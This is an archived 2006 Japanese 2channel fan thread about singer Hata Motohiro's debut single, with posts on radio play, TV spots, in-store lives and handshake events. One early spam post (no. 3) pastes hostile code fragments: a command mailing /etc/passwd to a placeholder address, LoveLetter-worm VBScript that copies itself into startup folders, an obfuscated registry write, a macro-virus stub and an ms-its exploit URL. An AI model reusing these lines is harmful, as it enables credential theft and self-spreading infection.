5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

秦基博のファン集まれ

1 :NO MUSIC NO NAME:2006/10/10(火) 22:22:35 ID:k30tuwjA
オフィス・オーガスタ所属、11月08日『シンクロ』でメジャーデビュー決定

本名:秦 基博(はた もとひろ)
生年月日:1980年10月11日 天秤座
出身:宮崎県生まれ横浜育ち
血液型:A型

オフィシャル http://www.office-augusta.com/hata/

『シンクロ』視聴はここからできます http://www.bmgjapan.com/_artist/info.php?id=2131

2 :NO MUSIC NO NAME:2006/10/10(火) 22:23:14 ID:k30tuwjA
オーガスタキャンプで聴いただけなんだけど、とりあえず唄がめちゃめちゃ上手い。

3 :NO MUSIC NO NAME:2006/10/10(火) 22:28:19 ID:3h0mLqxV
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

4 :NO MUSIC NO NAME:2006/10/11(水) 05:49:55 ID:craJMhxR
クォン・サンウ「日本のショップの悪徳運営…わたしも被害者」
ttp://japanese.chosun.com/site/data/html_dir/2006/07/16/20060716000023.html

クォン・サンウが日本で1年間自身と関連した商品を販売してきた某ショップに問題が
あるとして、20日まで店を閉鎖するという意を明らかにした。  クォン・サンウは最近、
自身のファンクラブのホームページに「幾つかの問題のために誤解があったようだ。
日本にあるショップはわたしではなく、ほかの人間が関与し1年間運営されていた。
(ファンは)この店を公式的なクォン・サンウショップであると誤解しているが、私も被害者の
1人」とし、「20日までこのショップを閉鎖することにした」という書き込みを残した。
 「公式サイトも、わたしではないほかの人間がわたしの意思とは関係なく不誠実に
運営していると聞いている」とし、「ファンのみなさんのためにもこのような運営方式を
ひとつずつ解決していくつもり」という意思を明らかにした。
 「この書き込みだけがクォン・サンウ自身の考えである」とし、「いつも応援してくださる
ファンのみなさんに感謝の言葉をささげたい」という言葉で締めくくった。


ホーム > お知らせ 記事入力 : 2006/07/19 17:23
ttp://japanese.chosun.com/site/data/html_dir/2006/07/19/20060719000038.html

【掲載記事の訂正およびお詫び】

 7月16日付で掲載されました、クォン・サンウ「日本のショップの悪徳運営…わたしも
被害者」という記事の見出し中の「悪徳」という表現に行き過ぎた部分がありました。

 読者の方、並びに関係各位に深くお詫び申し上げ、訂正いたします。

朝鮮日報


5 :NO MUSIC NO NAME:2006/10/13(金) 01:48:42 ID:0CVkb805
誰も知らないのかな
とりあえずちょこちょこ保守しよう

6 :NO MUSIC NO NAME:2006/10/13(金) 19:10:25 ID:mUyItmJT
秦君好きです!
あの歌声にやられましたね。。

7 :NO MUSIC NO NAME:2006/10/13(金) 20:37:55 ID:joNm4SLx
オーキャンで初めて聞いた。長澤に注目してて全然興味なかったけど秦くんいいね
ガラスとはがねで出来た声だっけ


8 :NO MUSIC NO NAME:2006/10/13(金) 21:54:09 ID:dUQ4mmQu
j-waveのCMでヘビロテになった模様

9 :NO MUSIC NO NAME:2006/10/15(日) 04:02:11 ID:+wPrD155
>>8
マジですか?すごい。
オーキャンで聞いてからはまりました。
彼はビッグになると思います。 
デビュー前から注目したアーは彼が初めてなんで
これからが楽しみです。

10 :NO MUSIC NO NAME:2006/10/15(日) 22:38:31 ID:+crTm0xK
来月のFM802のヘビロは間違いなさそだな。
スキマのデビューの時と扱いが似てる気がする。

11 :NO MUSIC NO NAME:2006/10/15(日) 22:57:50 ID:kArv51vH
>>10
まぁスキマの次の新人だからね!そうだったら嬉しいけど・・

来月からインストアライブいろいろ回るのかな?

12 :NO MUSIC NO NAME:2006/10/16(月) 02:11:13 ID:H0zsT0FR
スキマの次は長澤なんだけどね。
長澤は好き嫌いはっきりしそうだからね。
秦くんは声も曲も聴きやすいよね。
ただ公式BBSでヒーローって呼ばれてるのはちょっと引く。

13 :NO MUSIC NO NAME:2006/10/16(月) 02:43:24 ID:RrzjkNuI
>>12
長澤くんは年も若いしうたもまだ青い感じが濃くて
声の好き嫌いよりあの世界に入れる年齢幅が狭いんだと思う。
秦くんの曲と詞はわりとスタンダードだから
聞ける年代の幅広いとオモ。
802ヘビロテ来るかな?
シンクロ発売前なのに今日の802で
チャート100以内に入って来てたよ。

14 :NO MUSIC NO NAME:2006/10/16(月) 07:23:00 ID:g6sob2Yd
>>12
秦君、"AUGUSTA RECORDS"だから一応スキマの次の新人なんだよ^^
長澤くんはデビューの順番ではスキマの次だけどね。
インストアライブで長澤くん見たけど、すごいね
やっぱ生で見たほうがいいよ。
もう入ってたんだ?じゃあヘビロテ期待できるかも

15 :NO MUSIC NO NAME:2006/10/16(月) 14:15:43 ID:38nz4ARo
秦君良いね。オーガスタキャンプでビール片手に気持ちよく聞いたよ
暑かったなぁ〜ww

16 :NO MUSIC NO NAME:2006/10/16(月) 21:52:57 ID:cUb+3dI4
私もオーガスタキャンプで良いと思った!

17 :NO MUSIC NO NAME:2006/10/18(水) 00:31:40 ID:wVPr5ECZ
今レコーディングやってるらしいけど
近々ミニアルバムもしくはアルバムでるのかな?
ライブで聞いた曲どれもよかったからwktk!
早くシンクロ出ないかなぁ。

18 :NO MUSIC NO NAME:2006/10/18(水) 03:40:23 ID:PiQ6zV9q
レコ発か、デビューイベントやらないのかなぁ。

19 :NO MUSIC NO NAME:2006/10/18(水) 17:05:51 ID:6hV8UuKE
インストアライブ決定したねー
直筆サイン入りプレートが貰えるらしい・・・

20 :NO MUSIC NO NAME:2006/10/18(水) 17:13:34 ID:MXdmWzd/
シンクロなんかアレンジが悪いような
オーキャンで聴いたやつのほうが何倍も好きだ

21 :NO MUSIC NO NAME:2006/10/18(水) 18:27:31 ID:wVPr5ECZ
秦くんはアコギだけで十分いいよね。
インストア楽しみだ。

22 :NO MUSIC NO NAME:2006/10/18(水) 20:17:47 ID:PiQ6zV9q
やったネ!インストア!!
↑のを見て・・・ってことはないだろうけどタイミングいいね!

弾き語りでもちろんいいけど、バンドがいたら
どんな感じかめっちゃ興味がある。

23 :NO MUSIC NO NAME:2006/10/19(木) 23:26:45 ID:BjsUjlEc
昔の日記もう見れなくなっちゃったんだね。
どっかの漫才師と一緒に写ってる写真、とっても顔が丸い。
デビューのためにやせたのかな。

24 :NO MUSIC NO NAME:2006/10/20(金) 00:37:49 ID:Sxo+7K+H
アルバムの試聴とかネットラジオ(?)も1つだけあったよねー
弾き語りとかも聴けてよかったのに。

25 :NO MUSIC NO NAME:2006/10/20(金) 03:49:57 ID:PPGHdbf9
来月のCDTVオープニング曲に
シンクロ決まったのはガイシュツ?

26 :NO MUSIC NO NAME:2006/10/20(金) 07:17:35 ID:Sxo+7K+H
>>25
本当に?スキマと同じ感じのデビューだね。
スキマも好きだから嬉しいけど

27 :NO MUSIC NO NAME:2006/10/21(土) 23:41:30 ID:L+CO0wdd
秦くんも売れ出したらスキマみたいに
暴走していってしまうのかな…

28 :NO MUSIC NO NAME:2006/10/23(月) 15:30:39 ID:zGLIb7hp
それは嫌だ…。。

29 :NO MUSIC NO NAME:2006/10/23(月) 18:55:32 ID:hGBGdSmo
良くも悪くもいつかは変わっていくだろうね

30 :NO MUSIC NO NAME:2006/10/25(水) 22:58:43 ID:DuQ+wmqn
>>12
なんでヒーロー?
まさか名前に「ひろ」が付くからってだけじゃないよな・・・

31 :NO MUSIC NO NAME:2006/10/26(木) 19:23:28 ID:IlgZgCZv
近々テレビでるみたいだね!
したら一気にここもオフィも人増えそうだねw
シンクロの先行試聴先みたらすごい数。
事務所かなり力入れてるね〜。

32 :NO MUSIC NO NAME:2006/10/26(木) 20:14:05 ID:8adRJ3MG
11月1日にFM802の番組に出るらしい。
詳細↓
PRIME HITZ 802 19:00-22:00
秦基博初登場!スタジオライブのあり!

33 :NO MUSIC NO NAME:2006/10/26(木) 21:52:38 ID:IlgZgCZv
>>32
お〜トントン!
スタジオライブやってくれるんだ!wktK!
二週間後にインストにも来るよね?
大阪大フィーチャーだね。

34 :ささせ:2006/10/27(金) 10:37:42 ID:Zo90/s7u
個人的に高音の部分のところがイラっと来る

35 :ささせ:2006/10/27(金) 11:06:44 ID:Zo90/s7u
個人的に高音の部分のところがイラっと来る

36 :NO MUSIC NO NAME:2006/10/27(金) 18:01:24 ID:3wIhRCck
初のテレビ出演の情報が更新されてた。

■10/30(月) TVK「音楽のDNA」生出演【NEW】
■11/13(月) TBS系「月光音楽団」出演【NEW】


37 :NO MUSIC NO NAME:2006/10/28(土) 00:18:11 ID:D2D6vOfo
イラっとくる人もいるんだね(笑
確かに、特徴があって、そこがいいんだけでも、
その反面、いやな人はいやだろうな〜
特徴があるがゆえに。

38 :NO MUSIC NO NAME:2006/10/28(土) 10:28:37 ID:ZFKxl7qK
自分も高音すきだけどな。
シンクロはシングルのより生の歌の方がいいな。
秦くんはCDに収めるよりライブ向きだと思う。
ラジオで聞いた野外ライブの音源かなりよかった。
大抵のアーは野外とかだと声安定してなくてブレるもんだけど。


39 :NO MUSIC NO NAME:2006/10/29(日) 21:48:50 ID:khujy/78
ちょこっとHMVに見に行ったら、見にきてる人少なくてびっくりした。
もっとファンがいるのかと思ってた。
事務所に所属する前から一人でずっとライブしてたって言ってたから
それなりに熱狂的なファンがいるのかと思ってた。

40 :NO MUSIC NO NAME:2006/10/29(日) 23:16:37 ID:IaXReMFF
>>39
自分は最近知ったからよきわからないけど
大学行ってたみたいだし路上でもやってなくて
決まったライブハウスでチョコチョコやりだしてすぐ
スカウトされたみたいだしスカウト後も一年くらいで
すぐデビューらしいからインディー活動期間自体
短かったからじゃない?
デビューして一度CMとかに使われたりしたら
かなり売れる人だと思うんだけど。
人少ない今のうちに近くで見たり楽しんでおくよ。

41 :NO MUSIC NO NAME:2006/10/30(月) 14:58:05 ID:PkYUOC1t
インストアライブ、初めての者なんですが…握手会まで入れて時間は1時間位ですかね?

42 :NO MUSIC NO NAME:2006/10/31(火) 00:01:40 ID:us4jx4Cl
そっか〜。じゃあラッキーな人なんだね。
下積みみたいなのほとんどなくって感じなのかな。
売れるのかな〜。私は好きだけど。
でも事務所の力ってすごいんだね。
デビュー前後に次々と色々な仕事が決まって。
今のうちに近くで見といた方が良いのかな。
ライブとかで目が合うのとかあまり経験ないから
恥ずかしくてやなんだけど。
もっとじっくり見たいのに、変に意識しちゃってライブを楽しめない。
ファンの数が150人前後位のライブが個人的にちょうど良く楽しめるのにな。
なんてあっという間いすごいことになるのかな〜

43 :NO MUSIC NO NAME:2006/10/31(火) 07:12:16 ID:NLpjlgbd
音楽のDNA良かったよ、シンクロ渋かったです〜
ところで「秦基博のチョイスで3択」で紹介されていた
帽子のボーカルがいるバンドの名前が分かる方いませんか?

ものすごくイイ曲だったけどバンド名が全然分からないんです
だれか教えて下さい〜

44 :NO MUSIC NO NAME:2006/10/31(火) 13:37:06 ID:Ms2qvx5s


45 :NO MUSIC NO NAME:2006/10/31(火) 17:52:53 ID:JhmU2PR7
わー、スレ立ってる!ウレシイ!!
もうすぐデビューシングル発売ですね。楽しみ。

46 :NO MUSIC NO NAME:2006/10/31(火) 22:59:58 ID:DscsPj2o
Lisa Loeb - Do You Sleep?
Amos Lee - Arms Of A Woman
Gnarls Barkley - Crazy

3択

47 :NO MUSIC NO NAME:2006/11/01(水) 01:10:09 ID:LK/Y6CA6
生放送の秦さんどうでしたか?
色々感想知りたいです。

そういえばうちの姪っ子3才が、DVDのみすぎで
生放送のTVも「いまのとこ、もう一回!」って言ってます。

48 :NO MUSIC NO NAME:2006/11/01(水) 20:46:22 ID:R00y4ujF
FM802予想通りてか予定通りにヘビロ来たね!
つか、今からゲストなのに聞けねーorZ
明日の昼もでるからまいっか!

49 :NO MUSIC NO NAME:2006/11/02(木) 14:00:55 ID:dKv2Njks
Amos Lee でした、返事くれた人ありがとうございます。
礼が遅くてすみません。

50 :NO MUSIC NO NAME:2006/11/02(木) 17:57:19 ID:AMiRJ5m6
秦基博 インタビュー
ttp://blog.so-net.ne.jp/music/brandnew06_006

51 :NO MUSIC NO NAME:2006/11/02(木) 18:39:04 ID:19EegT2/
>>50
おー!トン!
すんなりデビューできたわけじゃなかったんだね。
でもしっかり自分持ってるしいいな。
これからがホント楽しみだよ。

52 :NO MUSIC NO NAME:2006/11/03(金) 20:05:44 ID:H+HzI5r3
AMで偶然聞いてヨサゲだったので来ました。
歌がかなり上手いんでないかい、と。

53 :NO MUSIC NO NAME:2006/11/03(金) 21:00:38 ID:gm80lQYz
今夜は音楽戦士ですよ〜。
歌のみぽいけどまだ歌ってる様子あまり見れないから
必見だね。

54 :NO MUSIC NO NAME:2006/11/04(土) 01:47:00 ID:YqSzBm4U
社長部屋が秦君の作業場なんだって!?
ジャイアン・・すごいな。

55 :NO MUSIC NO NAME:2006/11/04(土) 01:49:34 ID:PVor5rhG
音楽戦士よかった!本当に良い声だね。スガシカオがコメント言ってたけどオーガスタでも評判なんだね。

56 :NO MUSIC NO NAME:2006/11/04(土) 06:47:58 ID:B+Ex9lWn
今朝のスポーツ新聞にでっかく載ってる
みたいなんだけど何新聞なんだろ?
なんかデビュー前だというのに物凄い扱いだな。

57 :NO MUSIC NO NAME:2006/11/04(土) 09:06:37 ID:6yutVA8V
FMキング秦基博です…スガシカオ、スキマスイッチも絶賛
ttp://hochi.yomiuri.co.jp/entertainment/news/20061104-OHT1T00056.htm

58 :NO MUSIC NO NAME:2006/11/04(土) 10:20:56 ID:l0tEQp7P
秦くん本当にいいからね〜。
久しぶりに音楽性が凄くしっかりしていて
曲によって突然路線変わってたり当たりハズレする心配もなく
安定してこの先聞いていけそうなアーだと思った。
まだ若いのに本当新人離れしてるかも。
しかし社長室使わせるなんて期待度やっぱり高いんだね。


59 :NO MUSIC NO NAME:2006/11/04(土) 19:42:09 ID:54cmZjeR
ま〜たオーガスタお得意の
社長&先輩絶賛(兼仲良しこよしアピール)でつかwww

60 :NO MUSIC NO NAME:2006/11/04(土) 21:27:02 ID:6JXuaqHq
>>59
先輩はともかく、社長は絶賛しないとまずいだろw
どうせ、身内の評価なんて誰も真に受けないんだし。

61 :NO MUSIC NO NAME:2006/11/05(日) 00:11:41 ID:b/RiuDgG
オーガスタに限らず事務所もレコ社も同じで
推薦文載せるなんて当たり前じゃね?
わざわざ嫌味ったらしく自分の無知を晒す人って
何がしたいのかね?

これからメジャーになったら意味不明なアンチも増えるんだろうな。

62 :NO MUSIC NO NAME:2006/11/05(日) 08:15:43 ID:EhSG1k44
TBSラジオのオススメ曲になったからか、JUNKの合間にめちゃめちゃ流れてる
リーチ結構ありそう。 よかったね。

63 :NO MUSIC NO NAME:2006/11/05(日) 13:20:12 ID:1qSUinG7
>>61
RCサクセションのディレクターだった頃からの
森川の常套手段を知ってるなら、そーゆー減らず口は叩けねーんだがなwww

64 :NO MUSIC NO NAME:2006/11/05(日) 14:35:58 ID:U2pdT6Dy
GyaoでシンクロのPVが見れるみたい
11/26までらしいからまだの人は今のうちに。

65 :NO MUSIC NO NAME:2006/11/05(日) 17:46:43 ID:BbvzUczG
ライブ行くと必ずいるアロハシャツみたいの着たおじさんは誰?
マネージャー?

66 :NO MUSIC NO NAME:2006/11/05(日) 21:57:43 ID:QCshmj8E
少なくとも>>59が音楽では判断できず、
表面の事象しか見れない芸能レポーターであることはわかった

67 :NO MUSIC NO NAME:2006/11/05(日) 22:03:48 ID:kKXMM641
秦君、声がいいね!!

68 :NO MUSIC NO NAME:2006/11/05(日) 22:23:52 ID:1qSUinG7
>>66
尾ー蛾廃連中のお子様ランチ的J-POPなんか
端から興味ありませんから、お構いなくwww

69 :NO MUSIC NO NAME:2006/11/06(月) 11:55:05 ID:JNkpsk1H
11月23日のインストアイベント行こうと思うんだけど
あんまり人居ないのかなーイベント当日CD買っても握手出来るのかな?
待てずに発売日に違うとこでも買ってしまうと思うけど…

70 :NO MUSIC NO NAME:2006/11/06(月) 20:03:52 ID:ek3O2VME
>>68
www構ってきてるのはオマエだwwwwwヨシヨシイーコイーコ

やっぱり音楽では判断しない芸能レポーターであることだけはよくわかったから、
あんまり知ったかぶんないほうがいいわよw
思わぬところで自分よりはるかに音楽聞いてる人に出会ったりスルからねwww

71 :NO MUSIC NO NAME:2006/11/06(月) 23:06:16 ID:o6N2uou7
お子様ランチ的J-POPって難しい表現。
はじめて聞いた。
じゃあこれからファンも歌い手も一緒に成長して、大人向きメニュー的J-POPに
ならなきゃってこと?
でも批判も大切だよね。みんながよいしょしすぎるのもって思っちゃう。
誉めすぎなオフィシャルに書きこみしにくい。
ちょっとでも話題それると書いちゃいけないのかな、とか考えちゃう。

72 :NO MUSIC NO NAME:2006/11/07(火) 01:11:04 ID:wEadBAan
変なの相手にして話広げるなよ。
どうせ秦だって聴いてないんだから。
だからレーベルでひとくくりにして蔑む、みたいなことしかできないんでしょ。
よいしょしすぎないこととバカの相手をちゃんと区別しないとな笑

じゃあよいしょしすぎない、というなら
ラジオで聴いて歌上手かったから来てみたけど、売れるのはもう1年かかるんじゃない?
曲が来年くらいにもう一皮むけたいところ。悪くはないけど素直過ぎて
まだあんまりこなれてないね。

73 :NO MUSIC NO NAME:2006/11/07(火) 02:38:07 ID:Tu0jUY9Q
>>72
まだデビューする段階だからこなれてないのは当たり前じゃない?
小さなライブハウスくらいしかまだ経験ないみたいだし。
逆に、急激に売れて足元見失ったりならないほうがいいから
じっくり自分の良さをのばしていい曲歌っていくアーになってほしいよ。
最近のあの事務所見てたらアイドル化させて行きそうで心配だが。

74 :NO MUSIC NO NAME:2006/11/07(火) 15:21:06 ID:tfULyfco
フラゲ完了。

75 :NO MUSIC NO NAME:2006/11/07(火) 21:18:03 ID:Tu0jUY9Q
フラゲ完了ノシ!

76 :NO MUSIC NO NAME:2006/11/07(火) 21:20:23 ID:7+cAxm+1
完了ー!

77 :NO MUSIC NO NAME:2006/11/08(水) 00:28:47 ID:6fooJKqR
デビューオメ!!
記念パピコ♪

78 :NO MUSIC NO NAME:2006/11/08(水) 22:35:38 ID:0CWSUsX/
ラジオで聴いたけど、スキマスイッチかと思った
声たまに似てるし曲もスキマスイッチっぽい

79 :NO MUSIC NO NAME:2006/11/08(水) 22:37:00 ID:0CWSUsX/
と思ったら同じ事務所なのか・・

80 :NO MUSIC NO NAME:2006/11/09(木) 02:42:48 ID:8kwLz872
声いいね
もっといろんな曲聴きたい

81 :NO MUSIC NO NAME:2006/11/09(木) 02:51:51 ID:5FkFXkYO
Gyao以外で、ネットで聞けるのあるのかなぁ?

82 :NO MUSIC NO NAME:2006/11/09(木) 18:31:31 ID:XSlOpGhu
かなり好きなんやけど。福岡にもライブ来て欲しい。

83 :NO MUSIC NO NAME:2006/11/09(木) 20:24:14 ID:47mfu0b/
>>82
11/26(日)16時からキャナルシティ博多 
B1F サンプラザステージでインストアライブあるよ。
観覧フリーなはず。
生声さらにいいから行けるなら必聴だよ。

84 :NO MUSIC NO NAME:2006/11/09(木) 23:33:42 ID:QoTbGMjj
>>78
全然歌いかた違うし声も似てない

85 :NO MUSIC NO NAME:2006/11/10(金) 05:29:59 ID:ZOF8GEaW
ようやくCDと握手券手に入れた!
が、パソコンの調子が悪くてエンハンズドとかいうのが
見れないんだけどどんな感じなの?
感想聞かせて!

いやしかしスキマに似てると感じる人もいるのか。

86 :NO MUSIC NO NAME:2006/11/10(金) 10:43:02 ID:w7tgstbp
>>85
どこの握手券ですか?新宿のも今買えば貰えるのかな?
別のとこでもう買ってしまったけど買いに行こうかな〜
まだ映像見てないから見たら書きますね〜

87 :NO MUSIC NO NAME:2006/11/10(金) 17:14:52 ID:ZOF8GEaW
握手券は大阪の。
大阪は3店舗で貰えるんだけど
なんば店で40番ぐらいだった。
新宿も間に合うといいね。
感想もヨロシク!

88 :NO MUSIC NO NAME:2006/11/11(土) 02:57:08 ID:HM6FYz+y
歌い方がスガシカオ

89 :NO MUSIC NO NAME:2006/11/11(土) 03:11:44 ID:Ktv909TO
>>88
音楽戦士にシカオが出た際に
「高音の時は自分と同じように割れた感じの声になる」って言ってたが、歌い方も?
CD買ったがほとんど聞いてない・・・


90 :NO MUSIC NO NAME:2006/11/11(土) 04:05:22 ID:BcgHhMzd
>>89
自分は声や曲好きだから買ったし
シカオに似てるとは思わないけど。
好きじゃないならムリに聞かなくてもいいんではないか。

91 :NO MUSIC NO NAME:2006/11/11(土) 12:55:19 ID:c+22fNF5
新宿のインストアって混むかな?
当日CD買いでも大丈夫かな??

92 :NO MUSIC NO NAME:2006/11/11(土) 13:30:45 ID:ouT0/CYo
握手会は新宿か、遠いなぁ (´・ω・`)
横浜でもやっておくれよぉ

93 :NO MUSIC NO NAME:2006/11/11(土) 14:18:01 ID:c+22fNF5
>>92
横浜と新宿って遠いか?
ところで秦くんのファン層ってどんぐらい?
よくライブに行く人教えてください。

94 :NO MUSIC NO NAME:2006/11/11(土) 14:55:42 ID:2kLD9uBm
この人インディーズでアルバムとか出してるの?
出てたら聞いてみたいと思って。

95 :NO MUSIC NO NAME:2006/11/11(土) 15:06:08 ID:c+22fNF5
>>94
出していたけどもう廃盤

96 :NO MUSIC NO NAME:2006/11/11(土) 15:10:15 ID:c+22fNF5
ところで、この子(秦)身長どのくらい?

97 :NO MUSIC NO NAME:2006/11/11(土) 15:35:17 ID:n+V39tlu
オーキャンでは山崎よりデカかったような
175はあるっしょ

98 :NO MUSIC NO NAME:2006/11/11(土) 16:16:56 ID:c+22fNF5
>>97
トン。そんなにデカイのかぁ

99 :NO MUSIC NO NAME:2006/11/11(土) 16:39:08 ID:c+22fNF5
山崎176センチ
シカオ171センチ
卓弥175センチ
秦・・・??

シカオが思いのほか小さいな

100 :NO MUSIC NO NAME:2006/11/11(土) 18:46:53 ID:2kLD9uBm
>>95d。
残念だな。聞いてみたかった。
聞いた事あったらどんな感じか教えて下さい。
インストアイベントでは2曲だけじゃないよね?

101 :NO MUSIC NO NAME:2006/11/11(土) 19:11:58 ID:+F9Tyb+r
インストアライブはだいたい30分6曲ぐらいだね。
せっかくだから握手会の時になんて声かけるか
考えておいたほうがいいよ!

102 :NO MUSIC NO NAME:2006/11/11(土) 19:20:45 ID:c+22fNF5
インストアは4曲らしいですよ

103 :NO MUSIC NO NAME:2006/11/11(土) 21:04:38 ID:BcgHhMzd
>>102
4曲なんだ〜
先日あった対バンライブで6曲ほど聞いたけど
どれもよかったよ〜。
早くミニでもいいからまとめて聞きたいな。
握手会なんて参加したことないからなんか恥ずかしいわw

104 :NO MUSIC NO NAME:2006/11/11(土) 21:53:54 ID:+F9Tyb+r
あ、4曲なのか。
んじゃちょっと早めに行ってリハ聴くか!
って聴けるのか?w

105 :NO MUSIC NO NAME:2006/11/12(日) 01:42:03 ID:56m6BQkC
凄くいい声だね
オーガスタだとは思わなかった

106 :NO MUSIC NO NAME:2006/11/12(日) 12:13:51 ID:EkSBTDds
スペシャで初めて聞いたんだがなかなか良いね
イントロのとこだけ聞くとACIDMAN的な印象を受けるけど

107 :NO MUSIC NO NAME:2006/11/12(日) 14:37:29 ID:dSaRrj0W
もちろんシンクロが聴きたくてCD買ったんだけど、
カップリングの曲が良くて、そっちばっか聴いてる。

108 :NO MUSIC NO NAME:2006/11/12(日) 18:30:06 ID:IO3v1bf0
>>107
自分もカップリングのアコギかなり好きだ〜
シンクロはラジオでのスタジオライブで聞いたけど
弾き語りバージョンの方が好みだ。
シングルのは若干エレキうるさいかな。

109 :NO MUSIC NO NAME:2006/11/13(月) 00:07:47 ID:ODiXOlQV
シンクロしか聞いた事無いけど、中島卓偉っぽい声だと思ったのは私だけか?
高音のところが特に。

110 :NO MUSIC NO NAME:2006/11/13(月) 14:05:41 ID:0OqytUss
日本人?

111 :NO MUSIC NO NAME:2006/11/13(月) 19:50:09 ID:6Ik+c8+Y
>>110
熊本出身の神奈川育ちの九州男児入った日本人だよw
名前と顔みたら一見韓流スターみたいだよね。
熊本では『秦』って名字が多いとかなんとか聞いたけど。

112 :NO MUSIC NO NAME:2006/11/14(火) 01:06:39 ID:XhCp/2BB
TV出てた

生で見てみたい!

113 :NO MUSIC NO NAME:2006/11/14(火) 01:39:21 ID:1LgBa6us
今思い出したorz
音楽戦士も日にち勘違いで見れなかったのに・・・
土曜日までお預けか。

114 :NO MUSIC NO NAME:2006/11/14(火) 01:44:38 ID:5psJwNSR
ああヤクルトの六番の人ね

115 :NO MUSIC NO NAME:2006/11/14(火) 01:47:00 ID:yfEBnyNe
>>112
ぜひ生でみてw
ライブ最高にいいよ!
自分もまた生で聞きたい。

116 :NO MUSIC NO NAME:2006/11/14(火) 01:58:08 ID:CWpuf8p/
テレビ見た。インストアの予定はあるみたいだけど
ライブの予定もあるの?見てみたい。
ファン層はどんな感じ?

117 :NO MUSIC NO NAME:2006/11/14(火) 02:16:55 ID:yfEBnyNe
>>116
しばらくはインストアだけみたいだね。
あとは抽選だけど招待で高知、福岡でやるみたいだよ。
HPにあった。
先日小さいライブハウスでやったのでは
20代〜30代くらいかな。女が多かったけど男もいたし。
曲が弾き語りだったんでマッタ〜リ曲を聞き込む感じだったよ。
ノリノリではなかった。

118 :NO MUSIC NO NAME:2006/11/14(火) 20:45:36 ID:/p5ALHsq
着うたフルまだー?

119 :NO MUSIC NO NAME:2006/11/14(火) 23:27:56 ID:qnwnBBVI
彼女って何歳知ってる?

120 :NO MUSIC NO NAME:2006/11/15(水) 18:12:19 ID:XsdnDXcP
>>111
宮崎生まれの神奈川育ちだよ

121 :NO MUSIC NO NAME:2006/11/15(水) 21:38:18 ID:4xKb+gtR
この人の声ってハスキーでいい!!!
スガシカオと声が似てる?

122 :NO MUSIC NO NAME:2006/11/16(木) 23:55:17 ID:dXIxLOR8
どんどんビックになっちゃうのかな〜。
ライブハウスではもうやらなそうな気もしてきた。
大きな事務所はすごいね。
どんどん仕事とってくるって感じで。

123 :NO MUSIC NO NAME:2006/11/17(金) 06:17:30 ID:8+EId1Md
オーガスタって大きい事務所なの?

124 :NO MUSIC NO NAME:2006/11/18(土) 00:09:53 ID:b96iQfgw
明日のインストア行く人いますか?

125 :NO MUSIC NO NAME:2006/11/18(土) 02:01:45 ID:HFjWUP0n
顔かわいい

126 :NO MUSIC NO NAME:2006/11/18(土) 05:27:44 ID:Q3tfg26U
いよいよ今日だね!
どれぐらい集まるんだろ?
楽しみだねぇ。

127 :NO MUSIC NO NAME:2006/11/18(土) 14:08:01 ID:NMVLEIql
今掛かってるよ

128 :NO MUSIC NO NAME:2006/11/18(土) 16:31:19 ID:uZwWiuTe
仕事が長引いて今日のイベント行けなくなった…
行ける人レポお願いします!
握手とかはないよね?

129 :NO MUSIC NO NAME:2006/11/18(土) 18:35:12 ID:H1+5y0II
握手ないの?新宿は握手あるよ。確か。
新宿ももうすぐだし楽しみだな〜
今日、行った人レポお願いします。

130 :NO MUSIC NO NAME:2006/11/18(土) 20:41:06 ID:8gvxpmnA
行ってきた〜(*´∀`*)
やぱすっごい歌よかったよ〜〜。
セトリ

やわらかな午後に遅い朝食を
シンクロ
僕らをつなぐもの
計4曲
MCを入れつつ。かなり人来てた!握手会もあったよ。
今日はライブ後でもCD買ったら余裕で握手会参加できたみたい。
焦って早くから行ってしまった。
秦くんやっぱライブ度胸いいしすごいいい声杉だわ。
優しそうで以外に面白いし好青年だったよ〜!
もっと聞きたかった。

131 :NO MUSIC NO NAME:2006/11/18(土) 21:47:50 ID:H1+5y0II
レポありがとう!
楽しみだ。握手会なんて行った事無いんだけど、何か声かけるの?
一人で行くので心細いよ…

132 :NO MUSIC NO NAME:2006/11/18(土) 22:05:11 ID:ULicrbuD
今日は何人ぐらい集まった?年齢層は?
新宿組だが、楽しみだ!

133 :NO MUSIC NO NAME:2006/11/18(土) 22:27:13 ID:YWS8SgZC
200人弱(多分)は居たと思う。かなり多かったな・・・
20〜30代が中心だった。
セットリスト以外にも、リハーサルの時に別の曲を2曲歌ってたよ。
だから全部で6曲歌ってくれたよ〜得した気分だった

行く人結構期待してていいと思うよ!

134 :NO MUSIC NO NAME:2006/11/18(土) 22:57:29 ID:8gvxpmnA
>>131
大丈夫だよ!自分も初めてで一人参加だったけど
わりと一人の人多かったしイベンターが誘導してくれるから。
本人前にしたらかなり緊張した〜けど
秦君自体やわらかい雰囲気で優しいから威圧感とかないし大丈夫だよ。
